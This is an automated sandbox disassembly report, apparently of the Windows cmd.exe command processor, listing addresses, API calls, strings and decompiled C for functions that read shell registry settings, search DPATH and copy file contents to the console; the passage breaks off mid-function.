0x00d9e5c2
0x00d9e5c2
0x00d9e58d
0x00d9e594
0x00d9e594
0x00d9e58b
0x00d9431b
0x00d94349
0x00d94365
0x00d9436b
0x00d94399
0x00d943d5
0x00d943db
0x00d94409
0x00d9e65c
0x00d9e664
0x00d9444a
0x00d9444a
0x00d94454
0x00d94463
0x00d94463
0x00d944f0
0x00d944f0
0x00d9446e
0x00d94474
0x00d944a2
0x00d9e67c
0x00d9e68a
0x00d9e69a
0x00d9e6a7
0x00d9e6be
0x00d9e6a9
0x00d9e6b5
0x00d9e6b5
0x00d9e6c5
0x00d9e6c5
0x00d9e6d3
0x00d9e6e4
0x00d9e6e4
0x00d9e6d3
0x00d944ae
0x00000000
0x00d944ae
0x00d9445a
0x00d9445d
0x00d9e66a
0x00000000
0x00d9e66a
0x00000000
0x00d9445d
0x00d94416
0x00d9e62e
0x00d9e649
0x00000000
0x00d9e649
0x00d9e63b
0x00d9e641
0x00000000
0x00d9441c
0x00d9441c
0x00d94423
0x00d94423
0x00d94429
0x00d9442c
0x00d9e656
0x00d94442
0x00d94442
0x00d94444
0x00000000
0x00d94444
0x00d94434
0x00d94437
0x00d9443b
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9443b
0x00d94416
0x00d943a2
0x00d9e5f9
0x00d9e614
0x00000000
0x00d9e614
0x00d9e606
0x00d9e60c
0x00000000
0x00d943a8
0x00d943a8
0x00d943af
0x00d943af
0x00d943b5
0x00d943b8
0x00d9e621
0x00d943ce
0x00d943ce
0x00000000
0x00d943ce
0x00d943c0
0x00d943c6
0x00d943c7
0x00000000
0x00000000
0x00000000
0x00000000
0x00d943c7
0x00d9434b
0x00d94352
0x00d9e5d3
0x00000000
0x00000000
0x00d9e5e4
0x00d9e5ea
0x00000000
0x00d94358
0x00d94358
0x00d9435f
0x00d9435f
0x00000000
0x00d9435f
0x00d94352
0x00d944b4
0x00d944b4
0x00d944b7
0x00d944ba
0x00d944c0
0x00d944c8
0x00d944cf
0x00d944e7
0x00d944e7
0x00d944c0

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00D9423D
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 00D9427D
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00D942B7
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00D94307
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 00D94341
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,CompletionChar,00000000,00000001,?,00001000), ref: 00D94391
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00D94401
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,AutoRun,00000000,00000004,?,00001000), ref: 00D9449A
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D944AE
time.MSVCRT ref: 00D944C8
srand.MSVCRT ref: 00D944CF

Strings

EnableExtensions, xrefs: 00D942AC
DisableUNCCheck, xrefs: 00D94272
DelayedExpansion, xrefs: 00D942FC
PathCompletionChar, xrefs: 00D943F6
AutoRun, xrefs: 00D9448F
DefaultColor, xrefs: 00D94336
CompletionChar, xrefs: 00D94386
Software\Microsoft\Command Processor, xrefs: 00D94235

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: QueryValue$CloseOpensrandtime
String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
API String ID: 145004033-3846321370
Opcode ID: 13be3d6369a4447206d227be77ea2295818fc32280b42c3f6e23e50dfae64452
Instruction ID: 4c606270361fadeceef5b5112031924fc1e62430c671d8f4cd034bf3e3cb312f
Opcode Fuzzy Hash: 13be3d6369a4447206d227be77ea2295818fc32280b42c3f6e23e50dfae64452
Instruction Fuzzy Hash: 56C172359002A9DADF329B50DD44FD9B778FB09702F1040D6E589E2191D6B09EC9CF79

Uniqueness

Uniqueness Score: -1.00%

Function 00DA65A0, Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 430
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00DA65A0(WCHAR* __edx, WCHAR* _a4, long _a8, WCHAR* _a12, long _a16, signed int _a20, int _a24, short* _a28, void* _a32, signed int _a36, signed int _a40, WCHAR* _a44, WCHAR* _a48, void* _a52, long _a56, char _a60, intOrPtr _a68, void _a72, void* _a592, char _a596, long _a600, void _a608, void _a610, short _a1128, signed int _a4204) {
				void* _v0;
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				WCHAR* _t150;
				void* _t155;
				long _t157;
				WCHAR* _t160;
				signed int _t161;
				WCHAR* _t164;
				void* _t172;
				long _t174;
				WCHAR* _t175;
				signed int _t176;
				WCHAR* _t178;
				long _t181;
				WCHAR* _t182;
				WCHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				long _t192;
				WCHAR* _t195;
				int _t197;
				void* _t198;
				WCHAR* _t199;
				void* _t202;
				WCHAR* _t206;
				long _t208;
				void* _t212;
				void* _t213;
				void* _t222;
				unsigned int _t226;
				WCHAR* _t228;
				void* _t232;
				unsigned int _t234;
				void* _t235;
				long _t245;
				int _t246;
				WCHAR* _t251;
				WCHAR* _t252;
				signed char* _t254;
				intOrPtr _t257;
				WCHAR* _t258;
				union _LARGE_INTEGER _t263;
				void* _t264;
				void* _t266;
				void* _t267;
				int _t268;
				WCHAR* _t269;
				signed int _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;

				_t253 = __edx;
				_t274 = _t273 & 0xfffffff8;
				E00D98290(0x1074);
				_t137 =  *0xdad0b4; // 0x35c4fbb8
				_a4204 = _t137 ^ _t274;
				_a56 = _a56 | 0xffffffff;
				_t262 = _a4;
				_a600 = 0x104;
				_a48 = _a4;
				_t266 = 0;
				_a52 = 0;
				_t212 = 1;
				_a20 = 0;
				_a60 = 0x7fffffff;
				_a32 = 0;
				_a36 = 0;
				_a40 = 1;
				_a592 = 0;
				_a596 = 1;
				memset( &_a72, 0, 0x104);
				_t275 = _t274 + 0xc;
				if(E00D90C70( &_a72, ((0 | _a596 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t253 = 0;
					_t263 = E00D8D120(_t262, 0,  &_a72);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						L13:
						_a28 =  &_a608;
						_t150 = E00D90178( &_a608);
						__eflags = _t150;
						if(_t150 == 0) {
							_t202 =  &_a60;
							__imp___get_osfhandle(_t202);
							_a56 = GetFileSize(_t202, _t263);
							__imp___get_osfhandle(0);
							SetFilePointer(0, _t263, 0, 0);
							_t30 =  &_a36;
							 *_t30 = _a36 & _t266;
							__eflags =  *_t30;
							_a32 = _t212;
						}
						while(1) {
							L15:
							__eflags =  *0xdad544;
							if( *0xdad544 != 0) {
								break;
							}
							_t155 =  &_a608;
							__imp___get_osfhandle(_t155, 0x200,  &_a4, 0);
							_t222 = _t263;
							_t156 = ReadFile(_t155, ??, ??, ??, ??);
							__eflags = _t156;
							if(_t156 == 0) {
								L81:
								_t157 = GetLastError();
								_push(0);
								_push(_t157);
								 *0xdc3cf0 = _t157;
								E00D8C5A2(_t222);
								L82:
								E00D8DB92(_t263);
								_t212 = 0;
								goto L87;
							}
							_t226 = _a4;
							__eflags = _t226;
							if(_t226 == 0) {
								goto L82;
							}
							__eflags = _a40;
							if(_a40 == 0) {
								L21:
								_a24 = _t226;
								__eflags = _t266;
								if(_t266 == 0) {
									L25:
									_t160 = E00D9269C(_t156);
									__eflags = _t160;
									if(_t160 != 0) {
										L28:
										_t268 = _a4;
										_t254 =  &_a608;
										_t228 = _t268;
										__eflags = _t268;
										while(1) {
											_a12 = _t228;
											if(__eflags == 0) {
												break;
											}
											_t161 =  *_t254 & 0x000000ff;
											__eflags =  *((char*)(_t161 + 0xdc7f30));
											if( *((char*)(_t161 + 0xdc7f30)) == 0) {
												L31:
												_t254 =  &(_t254[1]);
												_t228 = _t228 - 1;
												__eflags = _t228;
												continue;
											}
											_t253 =  &(_t254[1]);
											_t228 = _t228 - 1;
											__eflags = _t228;
											_a12 = _t228;
											if(_t228 == 0) {
												_t198 =  &_a12;
												__imp___get_osfhandle(_t253, _t212, _t198, 0);
												_t222 = _t263;
												_t199 = ReadFile(_t198, ??, ??, ??, ??);
												__eflags = _t199;
												if(_t199 == 0) {
													goto L81;
												}
												_t268 =  &(_a4[0]);
												__eflags = _t268;
												_a4 = _t268;
												_a24 = _t268;
												L36:
												_a28 = _a28 & 0x00000000;
												_t253 =  &_a608;
												_t164 = E00DA6CEF(_t212,  &_a608,  &_a24,  &_a28);
												__eflags = _t164;
												if(_t164 != 0) {
													L39:
													_t269 = MultiByteToWideChar( *0xdb3854, 0,  &_a608, _t268,  &_a1128, 0x400);
													_a12 = _t269;
													__eflags = _t269;
													if(_t269 == 0) {
														_t269 = 0x400;
														_a12 = 0x400;
													}
													_t226 = _a4;
													_a28 =  &_a1128;
													L42:
													__eflags = _a40;
													if(_a40 != 0) {
														__eflags =  *0xdc3cd0;
														if( *0xdc3cd0 != 0) {
															E00D8C5A2(_t226, 0x2354, _t212, _a48);
															_t226 = _a4;
															_t275 = _t275 + 0xc;
															_t269 = _a12;
														}
														_t75 =  &_a40;
														 *_t75 = _a40 & 0x00000000;
														__eflags =  *_t75;
													}
													_v0 = _a28;
													__eflags = _t269;
													if(_t269 <= 0) {
														L74:
														_t270 = _a32;
														_t253 = _a36;
														__eflags = _t270 | _t253;
														if((_t270 | _t253) != 0) {
															_t172 =  &_a32;
															__imp___get_osfhandle(_t172, _t212);
															SetFilePointerEx(_t172, _t263, 0, 0);
															_t253 = _a36;
															_t270 = _a32;
															_t226 = _a4;
														}
														__eflags = _t226 - _a24;
														if(_t226 != _a24) {
															goto L82;
														} else {
															__eflags = _a60 - _t253;
															if(__eflags < 0) {
																goto L82;
															}
															if(__eflags > 0) {
																L80:
																_t266 = _a20;
																goto L15;
															}
															__eflags = _a56 - _t270;
															if(_a56 <= _t270) {
																goto L82;
															}
															goto L80;
														}
													} else {
														do {
															_t174 = 0x50;
															__eflags = _t269 - _t174;
															if(_t269 <= _t174) {
																_a8 = _t269;
																__eflags = _t269;
																if(_t269 == 0) {
																	break;
																}
																L50:
																__eflags =  *0xdad544;
																if( *0xdad544 != 0) {
																	goto L86;
																}
																_t175 = E00D9269C(_t174);
																__eflags = _t175;
																if(_t175 == 0) {
																	__eflags =  *0xdc805c;
																	if( *0xdc805c != 0) {
																		__eflags = _a20;
																		if(_a20 == 0) {
																			_t176 = _a8;
																			_t232 = _v0;
																			L62:
																			_a68 = _t176 + _t176;
																			_t178 = E00D927C8(_t176 + _t176, _t232, _t176 + _t176,  &_a16);
																			__eflags = _a12;
																			_t257 = _v8;
																			_a36 = _t178;
																			if(_a12 != 0) {
																				 *((short*)(_a68 + _t257)) = _a52;
																			}
																			_t234 = _a16;
																			_t269 = _t269 - (_t234 >> 1);
																			_t181 = _a8;
																			_t258 = _t257 + _t234;
																			__eflags = _t258;
																			_v0 = _t258;
																			L65:
																			_t253 = _a44;
																			L66:
																			__eflags = _t253;
																			if(_t253 == 0) {
																				L68:
																				_t182 = GetLastError();
																				 *0xdc3cf0 = _t182;
																				__eflags = _t182;
																				if(_t182 == 0) {
																					 *0xdc3cf0 = 0x70;
																				}
																				_t235 = _t212;
																				_t183 = E00D90178(_t182);
																				__eflags = _t183;
																				if(_t183 == 0) {
																					_t236 = _t212;
																					_t184 = E00DA9953(_t183, _t212);
																					__eflags = _t184;
																					if(_t184 == 0) {
																						E00DA985A( *0xdc3cf0);
																					} else {
																						_push(0);
																						_push(0x2364);
																						E00D8C5A2(_t236);
																					}
																					goto L86;
																				} else {
																					_push(0);
																					_push(0x1d);
																					E00D8C5A2(_t235);
																					goto L72;
																				}
																			}
																			__eflags = _t234 - _t181 + _t181;
																			if(_t234 == _t181 + _t181) {
																				goto L72;
																			}
																			goto L68;
																		}
																		L60:
																		_t176 = _a8;
																		_t232 = _v0;
																		_a52 =  *(_t232 + _t176 * 2) & 0x0000ffff;
																		 *(_t232 + _t176 * 2) = 0;
																		goto L62;
																	}
																	__eflags = _a20;
																	if(_a20 != 0) {
																		goto L60;
																	}
																	_t190 = _a8;
																	L58:
																	__imp___get_osfhandle(0);
																	_t253 = WriteFile(_t190, _t212, _v0, _t190,  &_a16);
																	_t192 = _a16;
																	_t269 = _t269 - _t192;
																	_v0 = _v0 + _t192;
																	_t234 = _t192 + _t192;
																	_t181 = _a8;
																	_a16 = _t234;
																	goto L66;
																}
																_t195 = WriteConsoleW(GetStdHandle(0xfffffff5), _v0, _a8,  &_a16, 0);
																_a44 = _t195;
																__eflags = _t195;
																_t190 = _a8;
																if(_t195 == 0) {
																	goto L58;
																}
																_t245 = _a16;
																__eflags = _t245 - _t190;
																if(_t245 != _t190) {
																	goto L58;
																}
																_t269 = _t269 - _t245;
																_t234 = _t245 + _t245;
																_v0 = _v0 + _t234;
																_a16 = _t234;
																goto L65;
															}
															_a8 = _t174;
															goto L50;
															L72:
															__eflags = _t269;
														} while (_t269 > 0);
														_t226 = _a4;
														goto L74;
													}
												}
												_t197 = _a24;
												__eflags = _t197;
												if(_t197 == 0) {
													goto L82;
												}
												_t268 = _t197;
												goto L39;
											}
											goto L31;
										}
										goto L36;
									}
									__eflags =  *0xdc805c - _t160;
									if( *0xdc805c != _t160) {
										goto L28;
									}
									_t226 = _a4;
									_t269 = _t226;
									L23:
									_a12 = _t269;
									goto L42;
								}
								_t269 = _t226 >> 1;
								__eflags = _t269;
								goto L23;
							}
							_t156 = 0xfeff;
							__eflags = _a608 - 0xfeff;
							if(_a608 != 0xfeff) {
								_t45 =  &_a20;
								 *_t45 = _a20 & 0x00000000;
								__eflags =  *_t45;
								_a24 = _t226;
								goto L25;
							}
							_t246 = _t226 - 2;
							__eflags = _t246;
							_a4 = _t246;
							_t266 = _t212;
							_a20 = _t266;
							_t156 = memmove( &_a608,  &_a610, _t246);
							_t226 = _a4;
							_t275 = _t275 + 0xc;
							goto L21;
						}
						L86:
						E00D8DB92(_t263);
						goto L87;
					}
					_t206 = E00D93320(L"DPATH");
					__eflags = _t206;
					if(_t206 == 0) {
						L11:
						_t250 =  *0xdc3cf0;
						__eflags =  *0xdc3cf0 - 0x7b;
						if( *0xdc3cf0 == 0x7b) {
							_t250 = 2;
							 *0xdc3cf0 = _t250;
						}
						goto L2;
					}
					_t251 = _a592;
					__eflags = _t251;
					if(_t251 == 0) {
						_t251 =  &_a72;
					}
					_t208 = SearchPathW(_t206, _a48, 0, _a600, _t251, 0);
					__eflags = _t208;
					if(_t208 == 0) {
						goto L11;
					}
					_t252 = _a592;
					__eflags = _t252;
					if(_t252 == 0) {
						_t252 =  &_a72;
					}
					_t253 = 0;
					_t263 = E00D8D120(_t252, 0, _t252);
					__eflags = _t263 - 0xffffffff;
					if(_t263 != 0xffffffff) {
						goto L13;
					} else {
						goto L11;
					}
				} else {
					_t250 = 8;
					L2:
					E00DA985A(_t250);
					L87:
					__imp__??_V@YAXPAX@Z(_a592);
					_pop(_t264);
					_pop(_t267);
					_pop(_t213);
					return E00D96FD0(_t212, _t213, _a4204 ^ _t275, _t253, _t264, _t267);
				}
			}

0x00da65a0
0x00da65a5
0x00da65ad
0x00da65b2
0x00da65b9
0x00da65c0
0x00da65ca
0x00da65d3
0x00da65e1
0x00da65e5
0x00da65e7
0x00da65eb
0x00da65ec
0x00da65f1
0x00da65f9
0x00da65fd
0x00da6601
0x00da6605
0x00da660c
0x00da6613
0x00da661e
0x00da663e
0x00da664e
0x00da6657
0x00da6659
0x00da665c
0x00da66cd
0x00da66d6
0x00da66da
0x00da66df
0x00da66e1
0x00da66e3
0x00da66e9
0x00da66f7
0x00da6701
0x00da6709
0x00da670f
0x00da670f
0x00da670f
0x00da6713
0x00da6713
0x00da6717
0x00da6717
0x00da6717
0x00da671e
0x00000000
0x00000000
0x00da6730
0x00da6739
0x00da673f
0x00da6741
0x00da6747
0x00da6749
0x00da6aad
0x00da6aad
0x00da6ab3
0x00da6ab5
0x00da6ab6
0x00da6abb
0x00da6ac2
0x00da6ac4
0x00da6ac9
0x00000000
0x00da6ac9
0x00da674f
0x00da6753
0x00da6755
0x00000000
0x00000000
0x00da675b
0x00da6760
0x00da679c
0x00da679c
0x00da67a0
0x00da67a2
0x00da67ba
0x00da67bc
0x00da67c1
0x00da67c3
0x00da67d5
0x00da67d5
0x00da67d9
0x00da67e0
0x00da67e2
0x00da6800
0x00da6800
0x00da6804
0x00000000
0x00000000
0x00da67e6
0x00da67e9
0x00da67f0
0x00da67fc
0x00da67fc
0x00da67fd
0x00da67fd
0x00000000
0x00da67fd
0x00da67f2
0x00da67f3
0x00da67f3
0x00da67f6
0x00da67fa
0x00da680a
0x00da6812
0x00da6818
0x00da681a
0x00da6820
0x00da6822
0x00000000
0x00000000
0x00da682c
0x00da682c
0x00da682d
0x00da6831
0x00da6835
0x00da6835
0x00da6846
0x00da684d
0x00da6852
0x00da6854
0x00da6864
0x00da6888
0x00da688a
0x00da688e
0x00da6890
0x00da6892
0x00da6897
0x00da6897
0x00da689b
0x00da68a6
0x00da68aa
0x00da68aa
0x00da68af
0x00da68b1
0x00da68b8
0x00da68c4
0x00da68c9
0x00da68cd
0x00da68d0
0x00da68d0
0x00da68d4
0x00da68d4
0x00da68d4
0x00da68d4
0x00da68dd
0x00da68e1
0x00da68e3
0x00da6a5d
0x00da6a5d
0x00da6a63
0x00da6a67
0x00da6a69
0x00da6a6c
0x00da6a76
0x00da6a7e
0x00da6a84
0x00da6a88
0x00da6a8c
0x00da6a8c
0x00da6a90
0x00da6a94
0x00000000
0x00da6a96
0x00da6a96
0x00da6a9a
0x00000000
0x00000000
0x00da6a9c
0x00da6aa4
0x00da6aa4
0x00000000
0x00da6aa4
0x00da6a9e
0x00da6aa2
0x00000000
0x00000000
0x00000000
0x00da6aa2
0x00da68e9
0x00da68e9
0x00da68eb
0x00da68ec
0x00da68ee
0x00da68f6
0x00da68fa
0x00da68fc
0x00000000
0x00000000
0x00da6902
0x00da6902
0x00da6909
0x00000000
0x00000000
0x00da6911
0x00da6916
0x00da6918
0x00da695d
0x00da6964
0x00da69a5
0x00da69aa
0x00da69c4
0x00da69c8
0x00da69cc
0x00da69d5
0x00da69dc
0x00da69e1
0x00da69e6
0x00da69ea
0x00da69ee
0x00da69f8
0x00da69f8
0x00da69fc
0x00da6a04
0x00da6a06
0x00da6a0a
0x00da6a0a
0x00da6a0c
0x00da6a10
0x00da6a10
0x00da6a14
0x00da6a14
0x00da6a16
0x00da6a1e
0x00da6a1e
0x00da6a24
0x00da6a29
0x00da6a2b
0x00da6a2d
0x00da6a2d
0x00da6a37
0x00da6a39
0x00da6a3e
0x00da6a40
0x00da6acd
0x00da6acf
0x00da6ad4
0x00da6ad6
0x00da6aee
0x00da6ad8
0x00da6ad8
0x00da6ada
0x00da6adf
0x00da6ae5
0x00000000
0x00da6a46
0x00da6a46
0x00da6a48
0x00da6a4a
0x00000000
0x00da6a50
0x00da6a40
0x00da6a1a
0x00da6a1c
0x00000000
0x00000000
0x00000000
0x00da6a1c
0x00da69ac
0x00da69ac
0x00da69b0
0x00da69b8
0x00da69be
0x00000000
0x00da69be
0x00da6966
0x00da696b
0x00000000
0x00000000
0x00da696d
0x00da6971
0x00da697e
0x00da698c
0x00da698e
0x00da6992
0x00da6994
0x00da6998
0x00da699b
0x00da699f
0x00000000
0x00da699f
0x00da6932
0x00da6938
0x00da693c
0x00da693e
0x00da6942
0x00000000
0x00000000
0x00da6944
0x00da6948
0x00da694a
0x00000000
0x00000000
0x00da694c
0x00da694e
0x00da6950
0x00da6954
0x00000000
0x00da6954
0x00da68f0
0x00000000
0x00da6a51
0x00da6a51
0x00da6a51
0x00da6a59
0x00000000
0x00da6a59
0x00da68e3
0x00da6856
0x00da685a
0x00da685c
0x00000000
0x00000000
0x00da6862
0x00000000
0x00da6862
0x00000000
0x00da67fa
0x00000000
0x00da6806
0x00da67c5
0x00da67cb
0x00000000
0x00000000
0x00da67cd
0x00da67d1
0x00da67a8
0x00da67a8
0x00000000
0x00da67a8
0x00da67a6
0x00da67a6
0x00000000
0x00da67a6
0x00da6762
0x00da6767
0x00da676f
0x00da67b1
0x00da67b1
0x00da67b1
0x00da67b6
0x00000000
0x00da67b6
0x00da6771
0x00da6771
0x00da6784
0x00da6788
0x00da678b
0x00da678f
0x00da6795
0x00da6799
0x00000000
0x00da6799
0x00da6af3
0x00da6af5
0x00000000
0x00da6af5
0x00da6663
0x00da6668
0x00da666a
0x00da66b4
0x00da66b4
0x00da66ba
0x00da66bd
0x00da66c1
0x00da66c2
0x00da66c2
0x00000000
0x00da66bd
0x00da666c
0x00da6673
0x00da6675
0x00da6677
0x00da6677
0x00da668c
0x00da6692
0x00da6694
0x00000000
0x00000000
0x00da6696
0x00da669d
0x00da669f
0x00da66a1
0x00da66a1
0x00da66a6
0x00da66ad
0x00da66af
0x00da66b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00da6640
0x00da6642
0x00da6643
0x00da6643
0x00da6afa
0x00da6b01
0x00da6b11
0x00da6b12
0x00da6b13
0x00da6b1e
0x00da6b1e

APIs

memset.MSVCRT ref: 00DA6613

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000105), ref: 00DA668C
??_V@YAXPAX@Z.MSVCRT ref: 00DA6B01

Part of subcall function 00D90178: _get_osfhandle.MSVCRT ref: 00D90183
Part of subcall function 00D90178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D9D6A1), ref: 00D9018D

_get_osfhandle.MSVCRT ref: 00DA66E9
GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 00DA66F1
_get_osfhandle.MSVCRT ref: 00DA6701
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00DA6709

Part of subcall function 00D9269C: _get_osfhandle.MSVCRT ref: 00D926A7
Part of subcall function 00D9269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D8C5F8,?,?,?), ref: 00D926B6
Part of subcall function 00D9269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D8C5C6), ref: 00D926D2
Part of subcall function 00D9269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,00000002), ref: 00D926E1
Part of subcall function 00D9269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D926EC
Part of subcall function 00D9269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D8C5C6), ref: 00D926F5

_get_osfhandle.MSVCRT ref: 00DA6739
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 00DA6741
memmove.MSVCRT ref: 00DA678F
_get_osfhandle.MSVCRT ref: 00DA6812
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00DA681A
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,00000400,00000000,00000000), ref: 00DA6882
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,00000000), ref: 00DA692B
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00DA6932
_get_osfhandle.MSVCRT ref: 00DA697E
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00DA6986
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?), ref: 00DA6A1E
_get_osfhandle.MSVCRT ref: 00DA6A76
SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00DA6A7E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00DA6AAD

Part of subcall function 00DA9953: _get_osfhandle.MSVCRT ref: 00DA9956
Part of subcall function 00DA9953: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00DA995E

Strings

DPATH, xrefs: 00DA665E

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: File_get_osfhandle$Type$ConsoleErrorHandleLastLockPointerReadSharedWritememset$AcquireByteCharModeMultiPathReleaseSearchSizeWidememmove
String ID: DPATH
API String ID: 1247154890-2010427443
Opcode ID: bc8415a1f3494fe01ad448ced1096f6ff4d4e3661bc637e2aeaecee426e5f22e
Instruction ID: 46752448c13232978e125d254c30c9e0343be4ebe6e4cfaf8db1ffad1fb31f7b
Opcode Fuzzy Hash: bc8415a1f3494fe01ad448ced1096f6ff4d4e3661bc637e2aeaecee426e5f22e
Instruction Fuzzy Hash: 16F16B71608342DFDB24DF24C849A6BB7E9EB89714F084A2DF985D7290EB74D904CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00D944FC, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242
registrythreadmemoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00D944FC() {
				signed int _v8;
				char _v24;
				int* _v28;
				char _v29;
				char _v36;
				void* _v40;
				int* _v44;
				int _v48;
				int _v52;
				signed int _t26;
				void* _t39;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t51;
				int _t53;
				intOrPtr _t55;
				int _t59;
				int _t64;
				void* _t73;
				void* _t75;
				intOrPtr _t82;
				void* _t84;
				void* _t95;
				char* _t96;
				signed int _t97;
				signed int _t98;

				_t26 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t26 ^ _t98;
				_v44 = 0;
				 *0xdbb938 = OpenThread(0x1fffff, 0, GetCurrentThreadId());
				E00D9465D(_t75);
				__imp__HeapSetInformation(0, 1, 0, 0, _t95, _t97, _t73);
				_v36 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Policies\\Microsoft\\Windows\\System", 0, 0x20019,  &_v40) == 0) {
					_v48 = 4;
					RegQueryValueExW(_v40, L"DisableCMD", 0,  &_v52,  &_v36,  &_v48);
					RegCloseKey(_v40);
				}
				 *0xdad614 = 1;
				_t93 = 0xdad600;
				 *0xdad610 =  &_v29;
				_t39 = E00D94719(0xdad600);
				asm("sbb al, al");
				 *0xdad614 =  *0xdad614 &  ~(_t39 - 1);
				E00D946D8();
				_v28 = 0;
				_t96 =  &_v24;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t44 = E00D93D27(0,  &_v24);
				if(_v36 == 1) {
					_push(0);
					_push(0x40002729);
					E00D8C108( &_v24);
					E00DA3BB0(__eflags, 0);
					do {
						__eflags = E00D94B60(__eflags, 0);
					} while (__eflags == 0);
					_push(0xff);
					goto L13;
				} else {
					_t96 = 0xff;
					if(_t44 == 0) {
						L29:
						_push(0);
						L00D982C1();
						_v28 = _t44;
						_t84 = 0xdbb8b8;
						_t97 = 2;
						__eflags = _t44;
						if(_t44 == 0) {
							L33:
							__eflags = _v36 - _t97;
							if(_v36 != _t97) {
								_t55 = E00D90178(_t44);
								__eflags = _t55;
								if(_t55 == 0) {
									_t97 = 3;
									__imp___setmode(0x8000);
									0 = 0;
								}
								E00D8B2B0(0, 0);
								while(1) {
									L40:
									 *0xdad590 = 0;
									EnterCriticalSection( *0xdb3858);
									 *0xdad544 = 0;
									LeaveCriticalSection( *0xdb3858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E00D8EEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
									if(_t96 == 1) {
										continue;
									}
									L41:
									__eflags = _t96 - 0xffffffff;
									if(__eflags == 0) {
										do {
											__eflags = E00D94B60(__eflags, 0);
										} while (__eflags == 0);
										L25:
										_push(0);
										L13:
										exit();
										L14:
										_t48 = E00D8EEF0(1, _t93,  *0xdc3cd8);
										if(_t48 == 1) {
											do {
												__eflags = E00D94B60(__eflags, 0);
											} while (__eflags == 0);
											_push(1);
											goto L13;
										}
										if(_t48 == 0xffffffff) {
											do {
												__eflags = E00D94B60(__eflags, 0);
											} while (__eflags == 0);
											goto L25;
										}
										_t93 = _t48;
										_t51 = E00D90E00(0, _t48);
										if(_t51 != 0) {
											_v28 = _t51;
										}
										L8:
										_t97 = _t97 + 1;
										if(_t97 < 3) {
											L7:
